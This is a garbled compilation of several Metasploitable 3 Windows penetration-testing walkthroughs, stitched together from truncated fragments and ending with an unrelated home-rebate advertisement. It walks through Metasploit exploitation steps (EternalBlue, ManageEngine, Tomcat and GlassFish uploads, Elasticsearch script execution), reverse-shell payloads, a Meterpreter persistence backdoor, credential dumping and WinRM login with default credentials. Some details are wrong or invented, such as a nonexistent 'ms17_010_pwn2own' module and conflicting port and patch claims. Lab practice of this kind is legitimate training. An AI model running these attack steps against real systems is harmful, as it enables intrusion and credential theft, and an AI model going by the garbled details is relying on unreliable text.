Metasploitable 3 is a purposefully vulnerable virtual machine designed by Rapid7 to help security professionals practice penetration testing. Unlike its predecessor, it features a Windows-based version (typically Windows Server 2008 R2) packed with misconfigurations and outdated software.
This walkthrough outlines the standard methodology for compromising the Windows instance of Metasploitable 3, moving from initial scanning to full system access. 1. Information Gathering & Enumeration
The first step is identifying the target and discovering open ports and services. Network Scanning to find the target on your network. nmap -sV -O
: Metasploitable 3 Windows typically hosts several high-value targets: Port 80/443 (HTTP/HTTPS) : Web servers (IIS, Apache). Port 445 (SMB) : File sharing. Port 3306 (MySQL) : Database access. Port 161 (SNMP) : System information. Port 5985 (WinRM) : Windows Remote Management. 2. Exploiting Web Services (The HTTP Entry Point)
A common entry vector involves the web applications running on the machine, such as ManageEngine Desktop Central Vulnerability
: ManageEngine often has known RCE (Remote Code Execution) vulnerabilities. The Exploit Open Metasploit: msfconsole Search for the exploit: search manageengine_connection_id Configure settings: set RHOSTS
Since the Windows version is often an unpatched Server 2008 R2, it is frequently susceptible to the famous EternalBlue (MS17-010) exploit. auxiliary/scanner/smb/smb_ms17_010 to confirm vulnerability. use exploit/windows/smb/ms17_010_eternalblue Set your payload (e.g., windows/x64/meterpreter/reverse_tcp (your IP) and (target IP). : Immediate SYSTEM-level access , which is the highest privilege on a Windows machine. 4. Post-Exploitation & Privilege Escalation
If your initial exploit only granted low-level user access (like ), you must escalate your privileges. Local Enumeration to check your status. Suggested Exploits : Use the Metasploit multi/recon/local_exploit_suggester
to find missing patches that can be exploited for elevation. Credential Dumping : Once you have SYSTEM access, use the
command in Meterpreter to grab password hashes for cracking via John the Ripper or Hashcat. 5. Flag Hunting
Metasploitable 3 is designed as a "Capture the Flag" (CTF) environment. Keep an eye out for: : Search for files hidden in user directories (Desktop, Documents). Registry Keys : Some flags are hidden within Windows Registry values.
: Check MySQL tables for hidden strings or admin credentials. Security Reminder Metasploitable 3 is an intentionally insecure environment.
deploy this VM on a public-facing network or any network you do not have permission to test. Always use a "Host-Only" or "NAT" network configuration in your virtualization software (VirtualBox/VMware).
Introduction
Metasploitable 3 is a vulnerable virtual machine designed for penetration testing and security training. It is a Windows-based system that is intentionally made vulnerable to various attacks, allowing security professionals to practice their skills in a safe and controlled environment. In this walkthrough, we will explore the steps to compromise Metasploitable 3 Windows and gain access to the system.
Initial Reconnaissance
The first step in any penetration test is to gather information about the target system. In this case, we can start by scanning the network to identify the IP address of Metasploitable 3 Windows. Using a tool like Nmap, we can perform a simple scan to identify the open ports and services running on the system.
nmap -sV <IP address of Metasploitable 3 Windows>
The scan results reveal that the system has several open ports, including 135 (RPC), 139 (SMB), and 445 (SMB). This information can be used to identify potential vulnerabilities and plan the next steps.
Identifying Vulnerabilities
Using the information gathered during the reconnaissance phase, we can now identify potential vulnerabilities in the system. One notable vulnerability is the SMB service, which is running on port 445. Metasploitable 3 Windows has a known vulnerability in the SMB service that can be exploited using the EternalBlue exploit.
Exploiting the Vulnerability
To exploit the EternalBlue vulnerability, we can use the Metasploit framework. First, we need to start the Metasploit service and search for the EternalBlue exploit.
msfconsole
search eternalblue
This will reveal the exploit//windows/smb/ms17_010_pwn2own module, which can be used to exploit the vulnerability. We can now use the following commands to configure and launch the exploit:
use exploit/windows/smb/ms17_010_pwn2own
set RHOST <IP address of Metasploitable 3 Windows>
set LHOST <IP address of our machine>
exploit
Gaining Access
Once the exploit is launched, Metasploit will establish a session on the target system. We can now use the sessions command to list the active sessions and interact with the compromised system.
sessions
This will reveal a list of active sessions, including the one we just established. We can now use the session -i command to interact with the compromised system.
session -i <session ID>
Post-Exploitation
Once we have access to the system, we can perform various post-exploitation activities, such as:
Using the meterpreter shell, we can use commands like hashdump to dump the password hashes, or shell to access the system shell.
Conclusion
In this walkthrough, we have demonstrated how to compromise Metasploitable 3 Windows using the EternalBlue exploit. This exercise highlights the importance of keeping systems up-to-date with the latest security patches and demonstrates the potential consequences of neglecting security updates. By following these steps, security professionals can practice their skills in a safe and controlled environment, helping to improve their expertise and prepare for real-world penetration testing scenarios.
Additional Recommendations
By following these best practices, organizations can reduce the risk of compromise and protect their systems from potential attacks.
Mastering Metasploitable 3: A Windows Exploitation Walkthrough
Metasploitable 3 is a intentionally vulnerable virtual machine designed for security professionals to sharpen their penetration testing skills. Unlike its predecessors, the Windows version offers a modern playground of misconfigurations and unpatched services. This walkthrough focuses on the Windows Server 2008 R2 version. 1. Reconnaissance and Scanning
Every successful exploit begins with information gathering. Using Nmap, we identify open ports and services running on the target. Command: nmap -sV -sC -Pn
Key Findings: You will likely see open ports for HTTP (80, 8282), SMB (445), MySQL (3306), and ManageEngine (8080). Each of these represents a potential entry point. 2. Exploiting Web Services: ManageEngine
One of the most reliable entry points on Metasploitable 3 is the ManageEngine Desktop Central 9 instance running on port 8080. It is vulnerable to a File Upload RCE (Remote Code Execution). Tool: Metasploit Framework
Module: exploit/windows/http/manageengine_connectionid_write Action: Set your RHOSTS to the target IP. Set PAYLOAD to windows/meterpreter/reverse_tcp. Execute exploit to gain a Meterpreter shell. 3. Exploiting SMB: EternalBlue (MS17-010)
While Metasploitable 3 is often patched against the basic EternalBlue, it remains a classic test case for checking legacy system security.
Check: Use the auxiliary module auxiliary/scanner/smb/smb_ms17_010 to see if the target is vulnerable.
Execution: If vulnerable, the exploit/windows/smb/ms17_010_eternalblue module can provide immediate SYSTEM level access, bypassing the need for further privilege escalation. 4. Privilege Escalation: From User to System
If you gained access as a low-privileged user (e.g., through the web server), you need to escalate your rights.
Technique: Use the multi/recon/local_exploit_suggester in Metasploit.
Common Vector: The AlwaysInstallElevated registry setting is often enabled on this VM. You can exploit this by generating a malicious .msi file that runs with elevated permissions. 5. Post-Exploitation: Database Access
Once inside, you can pivot to explore the databases. The MySQL service on port 3306 often contains sensitive credentials.
Access: Use mysql -h (often there is no password by default). metasploitable 3 windows walkthrough
Goal: Dump the users table from the web application database to find administrative credentials for other services on the network.
Metasploitable 3 provides a fantastic playground for learning the kill chain. In this walkthrough, we covered:
Lessons Learned:
Disclaimer: This walkthrough is for educational purposes only. Only perform these actions on systems you own or have explicit permission to test.
This paper provides a technical walkthrough for exploiting Metasploitable 3 (Windows)
, a VM purposefully designed with known vulnerabilities for security testing. This guide focuses on the enumeration and exploitation of common services to achieve a Meterpreter shell. Exploitation of Metasploitable 3 (Windows Edition) 1. Information Gathering & Enumeration
The first step in any penetration test is identifying open ports and services. Using , we scan the target IP to find potential entry points. nmap -sV -sC -Pn
The GlassFish Administration Console is often left with default credentials or unauthenticated access in lab environments. Vulnerability
: The management console allows the deployment of WAR (Web Application Archive) files. : Use Metasploit’s exploit/multi/http/glassfish_deployer set RHOSTS
: A Meterpreter session as the user running the GlassFish service. 3. Exploiting ManageEngine Desktop Central (Port 8020)
Metasploitable 3 often includes an outdated version of ManageEngine which is susceptible to a Java Deserialization vulnerability (CVE-2015-8249). exploit/windows/http/manageengine_connectionid_write windows/meterpreter/reverse_tcp : The exploit uploads a malicious payload via the ConnectionId parameter in the FileDownloadServlet
: SYSTEM-level access if the service is misconfigured, or a standard user shell requiring further escalation. 4. SMB Exploitation & EternalBlue (Port 445)
Depending on the specific build version of the Metasploitable 3 image, it may be vulnerable to MS17-010 (EternalBlue) use auxiliary/scanner/smb/smb_ms17_010 use exploit/windows/smb/ms17_010_eternalblue
: This exploit targets the SRV.SYS driver to execute code in the kernel. : Immediate NT AUTHORITY\SYSTEM 5. Post-Exploitation & Privilege Escalation
If you gain a low-privileged shell (e.g., via the web server), you must escalate privileges. Local Enumeration whoami /priv to check for enabled tokens like SeImpersonatePrivilege JuicyPotato SeImpersonatePrivilege
is available, the JuicyPotato tool can be used to escalate to SYSTEM. Credential Dumping : Once SYSTEM, use followed by in Meterpreter to dump cleartext passwords from memory. Conclusion
Metasploitable 3 Windows serves as an excellent environment for practicing the "chaining" of vulnerabilities. While automated tools like Metasploit make the initial access easy, the real value lies in manually enumerating the underlying service configurations to understand the exploit worked.
This walkthrough for the Windows version of Metasploitable 3
(typically Windows Server 2008 R2) covers setup, reconnaissance, and common exploitation paths. 1. Setup and Installation Metasploitable 3 is built using Vagrant and VirtualBox .
Requirements: Install Vagrant and VirtualBox on your host machine . Deployment:
Create a project folder: mkdir metasploitable3-workspace && cd metasploitable3-workspace . Download the Vagrantfile from the Rapid7 GitHub .
Run vagrant up win2k8 to build and start the Windows VM (this may take 30–60 minutes) . Credentials: Default login is vagrant / vagrant .
Networking: Ensure the VM is set to Host-Only or NAT Network to keep it isolated from the internet . 2. Reconnaissance (Information Gathering) The scan results reveal that the system has
Start by identifying the target IP and open ports from your attack machine (e.g., Kali Linux).
Identify IP: Run ipconfig on the target Windows VM to find its address .
Nmap Scan: Run a comprehensive scan to find vulnerable services:nmap -sV -sC -p- Key Ports to Watch: Port 21 (FTP): Often contains weak credentials .
Port 80 (HTTP): Hosts vulnerable web applications like ManageEngine or Jenkins . Port 445 (SMB): Susceptible to EternalBlue (MS17-010) .
Port 3389 (RDP): Potential for BlueKeep or credential brute-forcing .
Port 9200 (Elasticsearch): Known Remote Code Execution (RCE) vulnerabilities . 3. Exploitation Walkthroughs Path A: SMB EternalBlue (Port 445)
This is a critical RCE vulnerability in the SMBv1 protocol . Search: In MSFConsole, use search ms17_010_eternalblue. Select: use exploit/windows/smb/ms17_010_eternalblue. Configure: Set RHOSTS to the target IP.
Run: Execute exploit to gain a SYSTEM-level Meterpreter shell . Path B: Elasticsearch RCE (Port 9200)
Elasticsearch 1.1.1 on this machine allows unauthenticated dynamic script execution . Search: search elasticsearch_script_exec.
Select: use exploit/multi/elasticsearch/search_groovy_script. Configure: Set RHOSTS and your LHOST (Kali IP). Run: Gain access as the user running the service . Path C: FTP Brute Force & Web Shell (Port 21/80)
Brute Force: Use auxiliary/scanner/ftp/ftp_login with common wordlists to find credentials .
Upload: Log in via FTP and upload a PHP or ASPX web shell to the webroot (e.g., /www/wwwroot) .
Execute: Navigate to the uploaded file via a browser to trigger your reverse shell . 4. Post-Exploitation Once you have a shell (Meterpreter): SysInfo: Run sysinfo to confirm target details .
Hashdump: Use hashdump to extract local user password hashes for offline cracking .
Persistence: Use the persistence module to maintain access after a reboot .
🛡️ Penetration Testing Report: Metasploitable 3 (Windows) 1. Executive Summary
This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies. Target Details: Operating System: Windows Server 2008 R2 (Metasploitable 3) IP Address: 192.168.1.36 (Example IP) Testing Machine: Kali Linux 2. Methodology & Phases
The engagement followed the standard penetration testing execution standard: Reconnaissance & Scanning: Discovering live hosts and open ports. Vulnerability Analysis: Identifying outdated software and weak configurations. Exploitation: Gaining initial access to the system. Privilege Escalation: Elevating standard user access to administrative rights. 3. Detailed Walkthrough 🔍 Phase 1: Scanning & Enumeration
The initial step involved identifying exposed attack surfaces using Nmap. nmap -sV -sC -A Use code with caution. Copied to clipboard
Metasploitable 3 (Windows) Write-up — Part I: FTP (PORT 21)
Metasploitable 3 (Windows), typically built on Windows Server 2008 R2, is designed with numerous misconfigurations and unpatched services for security testing . The standard login for this VM is vagrant / vagrant . Key Attack Vectors & Vulnerabilities
Metasploitable 3 (Windows) Write-up — Part [I]: FTP (PORT 21)
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT 8080
msf6 > set HttpUsername tomcat
msf6 > set HttpPassword tomcat
msf6 > set PAYLOAD java/meterpreter/reverse_tcp
msf6 > exploit
If you have domain credentials (Metasploitable 3 has vagrant/vagrant and administrator/vagrant): 6. Defensive Notes (for Blue Team)
crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"
Or use evil-winrm for an interactive shell:
evil-winrm -i 192.168.56.103 -u administrator -p vagrant
To ensure you can come back later, install a backdoor (only in a lab environment!).
run persistence -U -i 10 -p 4444 -r <Your_IP>
# Read Windows config file
curl -XGET 'http://192.168.56.105:9200/_search?pretty' -H 'Content-Type: application/json' -d'
"script_fields":
"test":
"script": "java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(new java.io.FileInputStream(\"c:/windows/win.ini\"))); br.readLine();"
'
Bozarth Contractors is one of the very few companies in the state who can work with homeowners on the My Safe FL Home program. Click the link below to find out if you quality and to take advantage of this valuable new rebate program – you could be eligible for up to $10,000!